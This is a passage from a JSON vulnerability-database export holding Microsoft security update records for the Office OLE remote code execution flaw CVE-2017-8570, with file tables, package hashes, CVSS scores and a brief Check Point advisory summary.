1268| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale140.png| outlooklogosmall.contrast-white_scale-140.png| | 1547| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale180.png| outlooklogosmall.contrast-white_scale-180.png| | 2449| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale80.png| outlooklogosmall.contrast-white_scale-80.png| | 902| 25-Jun-17| 04:24 \noutlooklogosmall.scale100.png| outlooklogosmall.scale-100.png| | 1481| 25-Jun-17| 04:24 \noutlooklogosmall.scale140.png| outlooklogosmall.scale-140.png| | 1838| 25-Jun-17| 04:24 \noutlooklogosmall.scale180.png| outlooklogosmall.scale-180.png| | 2731| 25-Jun-17| 04:24 \noutlooklogosmall.scale80.png| outlooklogosmall.scale-80.png| | 1053| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale100.png| powerpntlogo.contrast-black_scale-100.png| | 1654| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale140.png| powerpntlogo.contrast-black_scale-140.png| | 2314| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale180.png| powerpntlogo.contrast-black_scale-180.png| | 3077| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale80.png| powerpntlogo.contrast-black_scale-80.png| | 1280| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale100.png| powerpntlogo.contrast-white_scale-100.png| | 1650| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale140.png| powerpntlogo.contrast-white_scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale180.png| powerpntlogo.contrast-white_scale-180.png| | 3059| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale80.png| powerpntlogo.contrast-white_scale-80.png| | 1259| 25-Jun-17| 04:24 \npowerpntlogo.scale100.png| powerpntlogo.scale-100.png| | 1721| 25-Jun-17| 04:24 \npowerpntlogo.scale140.png| powerpntlogo.scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.scale180.png| powerpntlogo.scale-180.png| | 3023| 25-Jun-17| 04:24 \npowerpntlogo.scale80.png| powerpntlogo.scale-80.png| | 1354| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale100.png| 
powerpntlogosmall.contrast-black_scale-100.png| | 1026| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale140.png| powerpntlogosmall.contrast-black_scale-140.png| | 1364| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale180.png| powerpntlogosmall.contrast-black_scale-180.png| | 1894| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale80.png| powerpntlogosmall.contrast-black_scale-80.png| | 746| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale100.png| powerpntlogosmall.contrast-white_scale-100.png| | 1022| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale140.png| powerpntlogosmall.contrast-white_scale-140.png| | 1307| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale180.png| powerpntlogosmall.contrast-white_scale-180.png| | 1874| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale80.png| powerpntlogosmall.contrast-white_scale-80.png| | 758| 25-Jun-17| 04:24 \npowerpntlogosmall.scale100.png| powerpntlogosmall.scale-100.png| | 1154| 25-Jun-17| 04:24 \npowerpntlogosmall.scale140.png| powerpntlogosmall.scale-140.png| | 1438| 25-Jun-17| 04:24 \npowerpntlogosmall.scale180.png| powerpntlogosmall.scale-180.png| | 1896| 25-Jun-17| 04:24 \npowerpntlogosmall.scale80.png| powerpntlogosmall.scale-80.png| | 874| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale100.png| spdesignlogo.contrast-black_scale-100.png| | 1559| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale140.png| spdesignlogo.contrast-black_scale-140.png| | 2383| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale180.png| spdesignlogo.contrast-black_scale-180.png| | 3497| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale80.png| spdesignlogo.contrast-black_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale100.png| spdesignlogo.contrast-white_scale-100.png| | 1548| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale140.png| spdesignlogo.contrast-white_scale-140.png| | 2534| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale180.png| 
spdesignlogo.contrast-white_scale-180.png| | 3725| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 25-Jun-17| 04:24 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 25-Jun-17| 04:24 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 25-Jun-17| 04:24 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 25-Jun-17| 04:24 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 25-Jun-17| 04:24 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 25-Jun-17| 04:24 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 25-Jun-17| 04:24 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale140.png| 
visiologo.contrast-black_scale-140.png| | 3195| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 25-Jun-17| 04:24 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 25-Jun-17| 04:24 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 25-Jun-17| 04:24 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 25-Jun-17| 04:24 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 25-Jun-17| 04:24 \nvisiologosmall.scale100.png| visiologosmall.scale-100.png| | 1285| 25-Jun-17| 04:24 
\nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 25-Jun-17| 04:24 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 25-Jun-17| 04:24 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 25-Jun-17| 04:24 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 25-Jun-17| 04:24 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 25-Jun-17| 04:24 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 25-Jun-17| 04:24 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale100.png| 
winprojlogosmall.contrast-white_scale-100.png| | 1119| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 25-Jun-17| 04:24 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 25-Jun-17| 04:24 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 25-Jun-17| 04:24 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 25-Jun-17| 04:24 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 25-Jun-17| 04:24 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 25-Jun-17| 04:24 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 25-Jun-17| 04:24 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 25-Jun-17| 04:24 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 25-Jun-17| 04:24 
\nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 25-Jun-17| 04:24 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 25-Jun-17| 04:24 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 25-Jun-17| 04:24 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 25-Jun-17| 04:24 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 25-Jun-17| 04:24 \nresources.pri| resources.pri| | 47040| 25-Jun-17| 04:24 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft 
Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2013: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213555", "href": "https://support.microsoft.com/en-us/help/3213555", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:35", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. 
To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 3 for the 2007 Microsoft Office Suite](<http://support.microsoft.com/kb/949585>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213640>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213640 for the 32-bit version of 2007 Microsoft Office Suite](<http://www.microsoft.com/download/details.aspx?familyid=11e460a6-673f-46ea-b6de-b5d798ca1381>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces the previously released update article KB3203436.\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2007-kb3213640-fullfile-x86-glb.exe| 3E1086C5468666EC8530F1C5E5EA4B8A10D65450| 4CB6A882DAFF17B58630AAB17F53A587F9846A72B463D2262D8C7B39CC67D93F \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. 
\nFor all supported x86-based versions of 2007 Microsoft Office Suite| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll| mso.dll| 12.0.6772.5000| 17,406,208| 04-Jul-2017| 02:38 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for 2007 Microsoft Office Suite: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213640", "href": "https://support.microsoft.com/en-us/help/3213640", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:26", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of Office 2016 installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213545>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213545 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=08a09e40-ffa3-4914-895b-6df525a5daa8>)\n * [Download the security update KB3213545 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=4474e27f-e778-4ee1-8964-577eafc8fff7>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3191882](<http://support.microsoft.com/kb/3191882>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmsodll302016-kb3213545-fullfile-x86-glb.exe| 332D2E32A6A7F7B3F6E4CBFBBF54ABE001120D67| 010C72A9BE5596DF34C1219E08245CAE471C6887EC3BD45F2FC5358B5395EF8C \nmsodll302016-kb3213545-fullfile-x64-glb.exe| 8F0138EABC7D356898006268F4CC0D6E030C7D11| 33C282E24CA8E76F4366E2F3CD2262F38ADC84C807E505C9BB1D8FDC715C27DA \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. 
\nFor all supported x86-based versions of Office 2016| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmsointl30.dll.x86.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:47 \nmsointl30.dll.x86.1054| msointl30.dll| 16.0.4483.1000| 80632| 27-Jun-17| 05:47 \nmso30win32client.dll| mso30win32client.dll| 16.0.4561.1002| 4767488| | \nmso30win32client.dll.x64| mso30win32client.dll| 16.0.4561.1002| 4767488| 27-Jun-17| 05:15 \nmsointl30.dll.x86.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll.x86| mso30win32client.dll| 16.0.4561.1002| 3199232| 27-Jun-17| 05:16 \nFor all supported x64-based versions of Office 2016File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nconversion.msoserver.msointl30_win32.dll_2074| msointl30_win32.dll| 16.0.4309.1000| 60608| | \nmsointl30.dll.x64.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:42 \nconversion.msoserver.msointl30_win32.dll_1054| msointl30_win32.dll| 16.0.4483.1000| 80640| 27-Jun-17| 05:42 \nmsointl30.dll.x64.1054| msointl30.dll| 16.0.4483.1000| 80640| 27-Jun-17| 05:42 \nmsointl30.dll.x86.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:47 \nmsointl30.dll.x86.1054| msointl30.dll| 16.0.4483.1000| 80632| 27-Jun-17| 05:47 \nconversion.msoserver.msointl30_win32.dll_1033| msointl30_win32.dll| 16.0.4309.1000| 59584| | \nmsointl30.dll.x64.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll| mso30win32client.dll| 16.0.4561.1002| 4767488| | \nmso30win32client.dll.x64| mso30win32client.dll| 16.0.4561.1002| 4767488| 27-Jun-17| 05:15 \nmsointl30.dll.x86.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll.x86| mso30win32client.dll| 16.0.4561.1002| 3199232| 27-Jun-17| 05:16 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity 
solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213545", "href": "https://support.microsoft.com/en-us/help/3213545", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-21T18:44:22", "description": "A remote code execution vulnerability exists in Microsoft Office. 
This vulnerability is due to incorrect handling of embedded OLE objects in Office documents. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-29T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office Composite Moniker Code Execution (CVE-2017-8570)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2022-11-21T00:00:00", "id": "CPAI-2017-0725", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-14T18:41:18", "description": "A vulnerability has been found in the way Windows Explorer handles LNK files. 
